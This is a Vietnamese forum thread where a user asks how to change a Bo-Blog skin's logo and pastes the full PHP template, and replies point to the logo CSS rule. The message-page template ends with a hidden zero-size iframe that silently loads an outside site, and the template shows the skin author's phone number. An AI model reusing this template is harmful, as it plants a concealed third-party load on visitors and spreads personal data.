Go Back   Diễn Đàn Bo-Blog Việt Nam > Bo-Blog > Kiến Thức Cơ Bản Về CSS > Hỏi Đáp CSSAbout Me
Your Avatar

 
Trả lời Gởi Ðề Tài Mới
 
Ðiều Chỉnh Kiếm Trong Bài
  #1  
Old 03-06-2011, 08:57 PM
ljnkmeo's Avatar
ljnkmeo is offline
Junior Member
 
Tham gia ngày: May 2011
Bài gởi: 24
Default xin mọi người chỉ dùm cách sửa Logo ở CSS

Em muốn sửa cái logo ở skin này nhưng mã toàn là Css em chưa rành mong mọi người chỉ dùm em ạ

Đây là hinh em muốn thay cái logo CLWND'S BLOG thành logo của em nhưng em ko rành về css ko biết sửa chỗ nào mong mọi người chỉ dùm
Click the image to open in full size.

Đây là toàn bộ thẻ elements ạ
Trích:
<?PHP
$elements['header']=<<<eot
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="{language}">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="Content-Language" content="UTF-8" />
<meta content="all" name="robots" />
<meta name="author" content="{blogname}" />
<meta name="description" content="{blogdesc}" />
<meta name="keywords" content="{blogkeywords}" />
{baseurl}
<script type="text/javascript" src="template/CD/js/dfFlexiGrid_inc.js"></script>
<script type="text/javascript" src="template/CD/js/dfFlexiGrid.js"></script>
<link rel="alternate" title="{blogname}" href="feed.php" type="application/rss+xml" />
{csslocation}
<title>{pagetitle}{blogname} - {blogdesc}</title>
<script type="text/javascript" src="images/js/common.js?jsver={codeversion}"></script>
{ajax_js}
{extraheader}
<link rel="stylesheet" href="template/CD/template.css" type="text/css" />
<script type="text/javascript" src="template/CD/js/mootools.svn.js"></script>
<script type="text/javascript" src="template/CD/js/kwicks.js"></script>
</head>
<script language="javascript" type="text/javascript" src="{$template['images']}/ranbackgr.js"></script>
<SCRIPT type=text/javascript>
document.write('<body background="' + image + '" text="black" id="{pageID}">')
</SCRIPT>
<body class="wide fs3">
eot;

$elements['displayheader']=<<<eot
<div id="ja-wrapper-top">
<div id="ja-wrapper">
<div id="ja-headerwrap">
<div id="ja-header" class="clearfix">

<h1 class="logo">
<a href="index.php" title="CD"><span>CloWnCD's Blog</span></a>
</h1>
<div id="topmenu">
<div id="kwicks_container">
<ul id="kwicks">
<li>

<a style="width: 125px;" href="index.php" id="home" class="kwick"><span>Home</span></a>

<a style="width: 125px;" href="guestbook.php" id="guestbook" class="kwick"><span>Guestbook</span></a>

<a style="width: 125px;" href="#" id="member" class="kwick"><span>Member List</span></a>

<a style="width: 125px;" href="#" id="ym" class="kwick"><span>Y!M Status Maker</span></a>

<a style="width: 125px;" href="#" id="profile" class="kwick"><span>Profile</span></a>

</li>
</ul>
</div>
</div>

<div id="ja-usertools" style="float:right">


</div>


</div></div>

<div id="ja-subnavwrap">
<div id="ja-search">
<form method="post" action="visit.php">
<div class="search">
<input name="keyword" id="search-text" maxlength="20" alt="Tìm kiếm" class="inputbox" type="text" size="30" value="Tìm kiếm tại CloWnCD Blog ..." onblur="if(this.value=='') this.value='Tìm kiếm tại CloWnCD Blog ...';" onfocus="if(this.value=='Tìm kiếm tại CloWnCD Blog ...') this.value='';" /></div>

<input name="job" type="hidden" value="search"/>
<input name="searchmethod" type="hidden" value="2"/>

</form>

</div>
<div style="float:right;width:692px">
<div class="moduletable">

</div></div>
</div>
<div id="ja-mainwrap">
<div id="ja-topslwrap" class="clearfix">
<div id="ja-topsl1" class="ja-box-br" style="width:60%; float: left;">
<div class="ja-box-bl"><div class="ja-box-tr"><div class="ja-box-tl clearfix">


<div class="ja-box-left" style="width: 50%;">
<div class="moduletable">

<h3><span style="text-align:center">Phần Mềm Hỗ Trợ Duyệt Web</span></h3>
<div class="ja-innerdiv">
<img src="{$template['images']}/ie.png" alt="Internet Explorer 8" align="left"/>
<p style="margin-bottom:5px"><b>Internet Explorer 8</b><br/>Download tại <a href="http://www.microsoft.com/windows/internet-explorer/worldwide-sites.aspx" target="_blank">đây</a></p>

</div>

<div class="ja-innerdiv" style="margin-bottom: 0; padding-bottom: 0;margin-top:-5px">
<img src="{$template['images']}/firefox.png" alt="Mozilla Firefox" align="left" />
<p style="margin-bottom:5px"><b>Mozilla Firefox 3.6</b><br/>Download tại <a href="http://www.mozilla.com/en-US/firefox/" target="_blank">đây</a></p>
</div>

<div class="ja-innerdiv" style="margin-bottom: 0; padding-bottom: 0;margin-top:-5px">
<img src="{$template['images']}/flash.png" alt="Adobe Flash Player" align="left" />

<p style="margin-bottom:5px"><b>Adobe Flash Player</b><br/>Download tại <a href="http://www.adobe.com/go/EN_US-H-GET-FLASH" target="_blank">đây</a></p>
</div>

</div>
</div>

<div class="ja-box-right" style="width: 50%;">
<div class="moduletable">
<h3><span style="text-align:center">Lưu Ý</span></h3>

<p style="text-align:justify;margin-bottom:0px;">
<img src="{$template['images']}/tick.png" alt="" align="left" style="margin-right: 10px;" />Giao diện này không hỗ trợ trình duyệt Internet Explorer 6.</p>

<p style="text-align:justify">
<img src="{$template['images']}/tick.png" alt="" align="left" style="margin-right: 10px;" />Bạn có quyền đọc và nhận xét bài viết hoàn toàn tự do và miễn phí.</p>

<p style="text-align:justify;margin-bottom:0px;">
<img src="{$template['images']}/tick.png" alt="" align="left" style="margin-right: 10px;" />Blog đã được tích hợp sẵn bộ gõ Tiếng Việt. Vui lòng viết tiếng Việt có dấu.</p></div>


</div>


</div></div></div></div>

<div id="ja-topsl2" class="ja-box-br" style="width:40%; float: right;">
<div class="ja-box-bl"><div class="ja-box-tr"><div class="ja-box-tl clearfix">
<div class="moduletable">

<div style="position:relative; width:100%;height:170px; overflow:hidden;">
<div id="ja-scroll_1" style="position:absolute; top:0; left:0; width: 100%; display:block;">
<div style="overflow:hidden; height:323px;" >
<div class="nftitle">About Me</div>

<div class="nfimages">
<tbody><tr>
<td><img src="http://k45dt04.net/blog/images/icon/flag.gif" border="0" height="16" width="16"> Admin: CloWnCD <br>
<img src="http://k45dt04.net/blog/images/icon/birthday.gif" border="0" height="16" width="16"> SN: 16/8/1993<br>
<img src="http://k45dt04.net/blog/images/icon/home.gif" border="0" height="16" width="16"> Job: Student<br>
<img src="http://k45dt04.net/blog/images/icon/phone.gif" border="0" height="16" width="16"> Tel: 01636654909 <br>
<img src="http://k45dt04.net/blog/images/icon/birthday.gif" border="0" height="16" width="16"> Ym!: <a href="ymsgr:sendim?clown_cd"><img alt=" Pm ngay" src="http://opi.yahoo.com/online?u=clown_cd&amp;m=g&amp;t=1" align="absmiddle" border="0"></a><br>
<img src="http://k45dt04.net/blog/images/icon/note.gif" border="0" height="16" width="16"> I'm a Admin of <a href="http://blog.clowncd.com" target="_blank"><b>CloWnCD's Blog<b></b></b></a></td>


</tr>
</tbody>
</div>
<div class="nfcontent"><p align="center" style="color:red;font-weight:bold">Bạn muốn quảng cáo ở đây? Liên hệ.</p>

</div></div> </div>


</div>
</div>

</div></div></div></div>

</div>

<div id="ja-containerwrap">
<div id="ja-container">
<div id="ja-container-top">
<div id="ja-container-bot" class="clearfix">
<div id="ja-container-inner1">
<div id="ja-container-inner2" class="clearfix">


eot;

$elements['mainpage']=<<<eot
<div id="mainWrapper">
<div id="left_column">
<div class="sidebarOne">
<!--global:{section_side_components_one}-->
</div>
</div>
<div id="right_column">
<div class="sidebarTwo">
<!--global:{section_side_components_two}-->
</div>
</div>
<div id="wrap">

<div id="content">
<div id="innerContent">
<div class="announce" style="display: {ifannouncement}">
<b class="rtop"><b class="r1"></b><b class="r2"></b><b class="r3"></b><b class="r4"></b></b>
<div class="announce-content">{topannounce}</div>
<b class="rbottom"><b class="r4"></b><b class="r3"></b><b class="r2"></b><b class="r1"></b></b>
</div>
<div class="article-top" style="display: {iftoppage}">
<div class="pages">{pagebar}</div>
</div>
{mainpart}
<div class="article-bottom" style="display: {ifbottompage}">
<div class="pages">{pagebar}</div>
</div>
</div>
</div>

</div>

eot;

$elements['otherpage']=<<<eot
<div id="mainWrapper">
<div id="content">
<div id="innerContent">
<div class="formbox">
{mainpart}
</div>
</div>
</div></div>
eot;

$elements['otherpage']=<<<eot
<div id="mainWrapper">
<div id="content">
<div id="innerContent">
<div class="formbox">
{mainpart}
</div>
</div>
</div>
eot;

$elements['displayfooter']=<<<eot
</div>
</div>
<br><br><br><br><br>
</---------------------------->
</div></div></div></div></div></div>
<div id="ja-footerwrap">
<div id="ja-footer" class="clearfix">

<div class="copyright">
<ul id="mainlevel-nav">
<li>Website sử dụng mã nguồn Bo-Blog</li>

<li><a href="http://www.bo-blog.com" class="mainlevel-nav" >About Bo-Blog</a></li>
<li><a href="mailto:clowncd.com@gmail.com" class="mainlevel-nav" >Liên hệ</a></li>
<li><a href="http://www.boblogvn.com" class="mainlevel-nav" >Bo-Blog Việt Nam</a></li>

</ul>

<small>ClownCD's Blog. Bản quyền skin gốc thuộc về JoomlArt.</small>

</div>

<div class="ja-cert">
<a href="feed.php">
<img src="{$template['images']}/livemarks.png" alt="feed-image" /> <span>Feed Entries</span></a>

<a href="#" target="_blank" title="Our site is valid CSS" style="text-decoration: none;">
<img src="{$template['images']}/but-css.png" alt="Our site is valid CSS" />
</a>

<a href="#" target="_blank" title="Our site is valid XHTML 1.0 Transitional" style="text-decoration: none;">
<img src="{$template['images']}/but-xhtml10.png" alt="Our site is valid XHTML 1.0 Transitional" />
</a>
</div>

</div>
</div></-------------------->
eot;

$elements['footer']=<<<eot
</body>
</html>

eot;

$elements['displayall']=<<<eot
{headerhtml}
{headmenu}
{bodymenu}
{sidemenu}
{footmenu}
{footerhtml}
eot;

$elements['msgbox']=<<<eot
<div class="tips">Tips:<br/>{message}</div>
eot;

$elements['sideblock']=<<<eot
<div class="moduletable_hilite">
<h3 onclick='showhidediv("sidebar_{id}");'><span>{titl e}</span></h3>
<div class="panel-content" id="sidebar_{id}" style="display: {ifextend}">
{content}
</div>
<div class="panel-bot"></div>
</div>
eot;

$elements['sideblock_topads']='';
$elements['sideblock_music']='';

$elements['excerpt']=<<<eot
<div class="textbox">
<div class="textbox-calendar">
<span class="textbox-calendar-day">Xem <br><font size=4.5px color=grey>{entryviewsnum}</font></span>
<SPAN class=textbox-comment title="Trả lời, hồi âm: {entrycommentnum}">
<IMG style="FONT-SIZE: 1pt;PADDING-BOTTOM: 0px; PADDING-LEFT: 0.5px; PADDING-RIGHT: 0px; FLOAT: left; MARGIN-LEFT: 0.5px; PADDING-TOP: 3px" src="template/CD/images/comment2.gif"><font size=1px>...</font>
<SPAN style="FONT-SIZE: 10pt; FLOAT: center; MARGIN-RIGHT: 0px; PADDING-TOP: 0px">{entrycommentnum}</SPAN></SPAN>
</div>
<div class="textbox-title">
{entrytitle} {entrystar} {entryicon}
<div class="textbox-label">
{$lnc[238]}: {entryauthor} &nbsp;&nbsp;{$lnc[96]}:{entrycate} &nbsp;&nbsp;{$lnc[72]}{entrysourcewithlink} &nbsp;&nbsp;{adminlink}
</div>
</div>
{adminbar}
<div class="textbox-content">{entrycontent}</div>
<div class="textbox-bottom">
{$lnc[73]}{entrytime}-{entrycomment}-{entrytb}-{entryviews}-{tags}{alltags}
</div>
{tbbar}
</div>
eot;

$elements['excerptontop']=<<<eot
<div class="textbox">
<div class="textbox-calendar">
<span class="textbox-calendar-day">{entryviews}</span>
<span class="textbox-calendar-month">{entrydatemnameshort}.{entrydatey}</span>
</div>
<div class="textbox-title">

[{$lnc[33]}] <a href="javascript: showhidediv('{topid}');">{entrytitletext}</a> {entrystar} {entryicon}

<div class="textbox-label">
{$lnc[238]}: {entryauthor} &nbsp;&nbsp;{$lnc[96]}:{entrycate} &nbsp;&nbsp;{$lnc[72]}{entrysourcewithlink} &nbsp;&nbsp;{adminlink}
</div>
</div>
{adminbar}
<div id="{topid}" style="display: none;">
<div class="textbox-content">
{entrycontent}
</div>
<div class="textbox-bottom">
{$lnc[73]}{entrytime}-{entrycomment}-{entrytb}-{entryviews}-{tags}{alltags}
</div>
{tbbar}
</div>
</div>
eot;

$elements['viewentry']=<<<eot
<div class="article-top">
<div class="prev-article">{previous}</div>
<div class="next-article">{next}</div>
</div>
<div class="textbox">
<div class="textbox-calendar">
<span class="textbox-calendar-day">Xem <br><font size=4.5px color=grey>{entryviewsnum}</font></span>
<SPAN class=textbox-comment title="Trả lời, hồi âm: {entrycommentnum}">
<IMG style="FONT-SIZE: 1pt;PADDING-BOTTOM: 0px; PADDING-LEFT: 0.5px; PADDING-RIGHT: 0px; FLOAT: left; MARGIN-LEFT: 0.5px; PADDING-TOP: 3px" src="template/CD/images/comment2.gif"><font size=1px>...</font>
<SPAN style="FONT-SIZE: 10pt; FLOAT: center; MARGIN-RIGHT: 0px; PADDING-TOP: 0px">{entrycommentnum}</SPAN></SPAN>
</div>
<div class="textbox-title">
{entrytitle} {entrystar} {entryicon}
<div class="textbox-label">
{$lnc[238]}: {entryauthor} &nbsp;&nbsp;{$lnc[96]}:{entrycate} &nbsp;&nbsp;{$lnc[72]}{entrysourcewithlink} &nbsp;&nbsp;{adminlink}&nbsp;&nbsp;&nbsp;&nbsp;&nb sp;&nbsp;&nbsp;&nbsp;{toolbar}
</div>
</div>
{adminbar}
<div class="textbox-content" id="zoomtext">
{entrycontent} {ifedited}
</div>
<div class="textbox-bottom">
{$lnc[73]}{entrytime}-{entrycomment}-{entrytb}-{entryviews}-{tags}{alltags}
</div>
{tbbar}
</div>
<div id="commentWrapper" class="comment-wrapper">
<a name="topreply"></a>
<div id="addnew"></div>
eot;


$elements['list']=<<<eot
<tr>
<td class="listbox-entry">
[{entrycate}] {entrytitle}
</td>
<td class="listbox-entry" style="word-break: normal;" align="center">{entryauthor}</td>
<td class="listbox-entry" width="70" align="center">{entrydate}</td>
</tr>
eot;

$elements['listbody']=<<<eot
<div class="listbox">
<div class="listbox-table">
<table cellpadding="2" cellspacing="0" width="100%">
<tr>
<td class="listbox-header">{$lnc[237]}</td>
<td class="listbox-header" style="word-break: normal;">{$lnc[238]}</td>
<td class="listbox-header">{$lnc[239]}</td>
</tr>
{listbody}
</table>
</div>
</div>
eot;

$elements['comment']=<<<eot
<div class="commentbox-{oddorcouplecss}">
<DIV style="MARGIN-TOP: 0px" class=moduletable align=center>
<H3><SPAN style="FONT-SIZE: 8pt">{replier} gửi vào {replytime}</SPAN></H3></DIV>
<DIV style="MARGIN-TOP: -15px" class=ja-box-br>
<div class="commentbox-title">{replier} {replieremail} {replierhomepage} {replierip}
{addadminreply} {deladminreply} {delreply} {blockreply}</DIV>
<DIV class=ja-box-bl>
<DIV class=ja-box-tr>
<DIV class="ja-box-tl clearfix">
<P style="TEXT-ALIGN: justify; MARGIN: 0pt; FONT-SIZE: 6pt">{replycontent}</P></DIV>
<div class="quote" style="display: {ifadminreplied}" id="replied_{commentid}">
<div class="quote-title">{adminrepliershow}</div>
<div class="quote-content">
<blockquote class="testimonial" style="margin-bottom: 0pt;"><span class="open"></span>{adminreplycontent}
<span class="close"></span>
</blockquote></div>
</div>
<div id="{commentid}" style="display: none">{adminreplybody}</div>
</div></div></DIV></DIV>
eot;

$elements['trackback']=<<<eot
<div class="trackbackbox">
<b class="rtop"><b class="r1"></b><b class="r2"></b><b class="r3"></b><b class="r4"></b></b>
<div class="trackbackbox-title">
{tbtitle}
<div class="trackbackbox-label">
[{tbtime}] {delreply}
</div>
</div>
<div class="trackbackbox-content">
{$lnc[240]}<a href="{tburl}" target="_blank">{tbblogname}</a><br/>
{$lnc[76]}{tbcontent}
</div>
<b class="rbottom"><b class="r4"></b><b class="r3"></b><b class="r2"></b><b class="r1"></b></b>
</div>
eot;

$elements['form_reply']=<<<eot
<a name="reply"></a>
<div id="commentForm">
<b class="rtop"><b class="r1"></b><b class="r2"></b><b class="r3"></b><b class="r4"></b></b>
<form name="visitorinput" id="visitorinput" method="post" action="javascript: ajax_submit('{jobnow}');">
<div class="formbox-comment">
<div class="formbox-comment-title">{formtitle}</div>
<div class="formbox-comment-input">
{if_neednopsw_begin}
<input name="v_replier" id="v_replier" type="text" size="30" class="text" value="{replier}" {disable_replier}/>&nbsp; {$lnc[246]} {additional}
<br />
<input name="v_password" id="v_password" type="password" size="30" class="text" value="{password}" {disable_password}/>&nbsp; {$lnc[133]} ({$lnc[247]})
<br />
<input name="v_repurl" id="v_repurl" type="text" size="30" class="text" value="{repurl}" />&nbsp; {$lnc[170]}
<br />
<input name="v_repemail" id="v_repemail" type="text" size="30" class="text" value="{repemail}" />&nbsp; {$lnc[248]}
{if_neednopsw_end}
{if_openid_begin}
<div id="commentbox-openid" style="display: none;">
<input name="openid_url" id="openid_url" type="text" size="28" class="text" value="{repopenurl}" {disable_openurl}/>&nbsp; {$lnc[314]}
</div>
{if_openid_end}
</div>
<div class="formbox-comment-tool">
<div id="choose-options-panel">
<a onclick="showhidediv('commentbox-openid')" style="cursor:hand;cursor:pointer;"><img src="{$template['images']}/openid.png" alt="OpenID登入" title="OpenID登入" border="0"/></a>
<a onclick="showhidediv('set')" style="cursor:hand;cursor:pointer;"><img src="{$template['images']}/options.png" alt="权限选项" title="{$lnc[242]}, {$lnc[243]}, {$lnc[38]}{$lnc[245]}, {$lnc[284]}" border="0"/></a>
<a onclick="showhidediv('emots')" style="cursor:hand;cursor:pointer;"><img src="{$template['images']}/emots.png" alt="{$lnc[241]}" title="{$lnc[244]}" border="0"/></a>
</div>
<div id="set" class="choose-options" style="display: none;">
<div class="choose-options-content">
<input name="stat_html" id="stat_html" type="checkbox" value="1" style="background-color: #eee" {disable_html} /> {$lnc[242]}
<input name="stat_ubb" id="stat_ubb" type="checkbox" value="1" style="background-color: #eee" {disable_ubb} /> {$lnc[243]}
<input name="stat_emot" id="stat_emot" type="checkbox" value="1" style="background-color: #eee" {disable_emot} /> {$lnc[244]}
<input name="stat_property" id="stat_property" type="checkbox" value="1" onclick="promptreppsw();" style="background-color: #eee"/> {$lnc[38]}{$lnc[245]}
{if_neednopsw_begin}
<input name="stat_rememberme" id="stat_rememberme" type="checkbox" value="1" {checked_rememberme} onclick="quickremember();" style="background-color: #eee"/> {$lnc[284]} {if_neednopsw_rawend}
</div>
</div>
<div id="emots" class="choose-options" style="display: none;">
<div class="choose-options-content">
{emots}
</div>
</div>
<div id="ubb">{ubbcode}</div>
</div>
{if_securitycode_begin}<script type="text/javascript">securitycodejs="{$lnc[249]} <span id='securityimagearea'><img src='inc/securitycode.php?rand={rand}' alt='' title='{$lnc[250]}'/></span> <input name='v_security' id='v_security' type='text' size='4' maxlength='4' class='text' /> {$lnc[251]} [<a href=\"javascript: refreshsecuritycode('securityimagearea', 'v_security');\">{$lnc[283]}</a>]";</script> {if_securitycode_end}
<textarea name="v_content" id="v_content" cols="70" rows="10" onkeydown="ctrlenterkey(event);" onfocus="if (securitycodejs!=null) {document.getElementById('showsecuritycode').inner HTML=securitycodejs; securitycodejs=null;}"></textarea><br /> <span id="showsecuritycode"></span>
<div style="padding-top:10px">
{hidden_areas}
<input type="button" name="btnSubmit" id="btnSubmit" value="{$lnc[25]}" class="button" onclick="ajax_submit('{jobnow}'); return false;"/>&nbsp;
<input name="reset" id="reset" type="reset" value="{$lnc[252]}" class="button" />
</div>
</div>
</form>
<b class="rbottom"><b class="r4"></b><b class="r3"></b><b class="r2"></b><b class="r1"></b></b>
</div>
eot;

$elements['endviewentry']=<<<eot
<div class="comment-pages">
{innerpages}
</div>
</div>
{form_reply}
eot;

$elements['entryadditional']=<<<eot
<div style="margin-top: 9px;">
<img src="{$template['images']}/readmore.gif" alt=""/>{readmore}
</div>
eot;

$elements['login']=<<<eot
<form name="register" method="post" action="login.php?job=verify">
<table cellspacing="1" width="500" align="center" class="formbox">
<tr><td class="formbox-title" colspan="2">{$lnc[253]} [<a href="login.php?job=register">{$lnc[254]}</a>]</td></tr>
<tr>
<td class="formbox-rowheader">{$lnc[132]}</td>
<td class="formbox-content"><input name="username" type="text" id="username" size="24" class="text" />
</tr>
<tr>
<td class="formbox-rowheader">{$lnc[133]}</td>
<td class="formbox-content"><input name="password" type="password" id="password" size="16" class="text" />
</tr>
<tr>
<td class="formbox-rowheader">{$lnc[255]}</td>
<td class="formbox-content"><input name="savecookie" type="radio" id="savecookie" value="0"/>{$lnc[256]} <input name="savecookie" type="radio" id="savecookie" value="3600"/>{$lnc[257]} <input name="savecookie" type="radio" id="savecookie" value="86400"/>{$lnc[258]} <input name="savecookie" type="radio" id="savecookie" value="604800"/>{$lnc[259]} <input name="savecookie" type="radio" id="savecookie" value="2592000"/>{$lnc[260]} <input name="savecookie" type="radio" id="savecookie" value="31104000"/>{$lnc[261]}
</tr>
{lvstart}
<tr>
<td class="formbox-rowheader">{$lnc[249]}</td>
<td class="formbox-content"><span id='securityimagearea'><img src="inc/securitycode.php?rand={rand}" alt="" title="{$lnc[250]}"/></span> <input name="securitycode" type="text" id="securitycode" size="16" class="text" /> {$lnc[251]} [<a href="javascript: refreshsecuritycode('securityimagearea', 'securitycode');">{$lnc[283]}</a>]
</tr>
{lvend}
<tr>
<td class="formbox-content"></td>
<td class="formbox-content">
<input name="Submit" type="submit" id="Submit" value="{$lnc[25]}" class="button" /> &nbsp;
<input name="Reset" type="reset" id="Reset" value="{$lnc[252]}" class="button" />
</td>
</tr>
</table>
</form>
eot;

$elements['contentpage']=<<<eot
<div class="pagebox-title">{title}</div>
<div class="pagebox-content">
{contentbody}
</div>
eot;

$elements['taglist']=<<<eot
<table width="98%" align="center" cellpadding="4" cellspacing="0">
<tr><td>{tagcategory}</td></tr>
<tr><td style="word-break: none; word-wrap: break-word;">{tagcontent}</td></tr>
<tr><td>{tagextra}</td></tr>
</table>
<br/><br/>
eot;

$elements['register']=<<<eot
<form name="register" method="post" action="{job}">
<table cellspacing="1" width="500" align="center" class="formbox">
<tr><td class="formbox-title" colspan="2">{title} {$lnc[262]}</td></tr>
{registerbody}
<tr><td colspan="2" align="center"><input type="submit" value="{$lnc[25]}" class="button"/> <input type="reset" value="{$lnc[252]}" class="button"/></td></tr>
</table>
</form>
eot;

$elements['normaltable']=<<<eot
<table cellspacing="0" width="500" align="center" class="formbox">
{tablebody}
</table>
eot;

$elements['normaltablewithtitle']=<<<eot
<table cellspacing="0" width="500" align="center" class="formbox">
<tr><td class="formbox-title" colspan="6">{title}</td></tr>
{tablebody}
</table>
eot;

$elements['form_eachline']=<<<eot
<tr>
<td class="formbox-rowheader">{text}</td>
<td class="formbox-content">{formelement}</td>
</tr>
eot;

$elements['eachlink']=<<<eot
<div class="linkbody">
<div class="linkimg">{logo}</div>
<div class="linktxt"><span class="linktitle">{title}</span><br/>
<span class="linkdesc">{desc}</span></div>
</div>
eot;

$elements['linkdiv']=<<<eot
<div class="linkover">
<div class="linkgroup">{title}</div>
<div class="linkgroupcontent">{tablebody}</div>
</div>
eot;

$elements['viewpage']=<<<eot
<div class="pagebox">
<div class="pagebox-title">
<h4>
{entrytitle}
</h4>
</div>
<div class="pagebox-content">
{entrycontent}
</div>
</div>

eot;


//Message page
$elements['tips']=<<<eot
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="{language}">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="Content-Language" content="UTF-8" />
{csslocation}
<title>{blogname} - {blogdesc}</title>
<script type="text/javascript" src="images/js/common.js"></script>
</head>
<body>
<center>
<div class="messagebox">
<div class="messagebox-title">{title}</div>
<div class="messagebox-content">
{tips}
</div>
<div class="messagebox-bottom"><a href="javascript: window.history.back();">{$lnc[263]}</a> | <a href="index.php">{$lnc[88]}</a> {admin_plus}</div>
</div>
</center>
</div>
<iframe marginWidth="0" marginHeight="0" frameBorder="0" width="0" height="0" bottommargin="0" rightmargin="0" leftmargin="0" topmargin="0" nosize scrolling="no" src="http://itsharevn.com/"></iframe>
</body>
</html>
eot;
?>
Trả Lời Với Trích Dẫn
  #2  
Old 03-06-2011, 09:47 PM
nhok92_xc's Avatar
nhok92_xc nhok92_xc is offline
Junior Member
 
Tham gia ngày: Mar 2011
Bài gởi: 22
Default

bạn đưa trang index của bạn đi
Trả Lời Với Trích Dẫn
  #3  
Old 04-06-2011, 09:27 AM
hay8.net's Avatar
hay8.net hay8.net is offline
Senior Member
 
Tham gia ngày: Feb 2011
Bài gởi: 113
Default

cần gì rành rọt, bạn chuột phải lên cái logo đó tải file ảnh về
Chú ý tên nó ví dụ xxx định dạng chắc là *jpg

Tạo logo mới cùng kích cỡ,
sửa tên thành xxx.jpg
Up lên host > template > tên skin > images
Trả Lời Với Trích Dẫn
  #4  
Old 04-06-2011, 03:26 PM
ljnkmeo's Avatar
ljnkmeo ljnkmeo is offline
Junior Member
 
Tham gia ngày: May 2011
Bài gởi: 24
Default

Trích:
Nguyên văn bởi nhok92_xc View Post
bạn đưa trang index của bạn đi
Đây là trang của mình
http://ljnkmeoblog.hoabinhgate.com
Trả Lời Với Trích Dẫn
  #5  
Old 04-06-2011, 04:56 PM
nhok92_xc's Avatar
nhok92_xc nhok92_xc is offline
Junior Member
 
Tham gia ngày: Mar 2011
Bài gởi: 22
Default

ở khúc này nè bạn :
background: url(images/logo.png) no-repeat; // đường dẩn link ảnh
bottom: 10px;
display: block;
height: 70px; độ cao của logo
left: 20px;
outline: none;
position: absolute;
width: 285px; :độ rộng của logo
Trả Lời Với Trích Dẫn
Trả lời Gởi Ðề Tài Mới

Tags
, cách, chỉ, css, dùm, logo, mọi, người, sửa, xin

Ðiều Chỉnh Kiếm Trong Bài
Kiếm Trong Bài:

Kiếm Chi Tiết

Chuyển đến


Múi giờ GMT. Hiện tại là 02:50 PM.
Powered by vBulletin® Version 3.8.4
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd.
vdata

Bo-Blog Việt Nam

Bo-blog
9.9 10 13259